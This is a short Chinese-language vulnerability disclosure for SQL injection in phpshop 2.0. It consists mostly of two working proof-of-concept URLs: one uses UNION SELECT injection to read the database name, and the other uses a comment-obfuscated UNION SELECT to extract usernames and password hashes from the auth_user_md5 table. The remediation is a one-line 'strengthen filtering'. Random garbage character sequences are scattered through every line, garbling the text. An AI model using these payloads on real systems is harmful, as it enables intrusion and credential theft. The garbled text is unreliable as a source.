标题 : phpshop 2.0 SQL Injection Vulnerability4 o( W! y* q. k! U
, d! b, ]' l6 p
作者 : By onestree
$ i$ J( z3 f8 V( X下载地址 : http://code.google.com/p/phpshop/downloads/list8 B' O; t, _) d
测试地址: windows 7 / ubuntu
$ ?: X7 v; M! u
4 ^3 t" A: a# J' ~9 E$ \; V
, ?6 a1 ^) r0 ?& q, eSQLi p0c:
( S* t I- q* R: c/ a & `5 D3 |: J8 `' b' n1 H
==================
9 P! {0 R5 O5 T# {# b) V+ S! P
" v1 }. `1 l8 m- u( V2 N/ mhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
N% h" S/ C* R1 G, y) \: Aunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
2 d; T0 ~2 T$ W , R1 ?0 N' e p" v) i6 g; ^+ J
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--; Q! p- P; A" h$ J- A1 {: m ^8 M
' h- ? f% _0 K$ z# X- e
修复:
/ o, M. p c- T加强过滤" g( ` h. O6 C" G
3 h( [7 ^" ~3 v* u, C* L4 L# Q" O1 v p/ b4 N3 l* h; R; I
|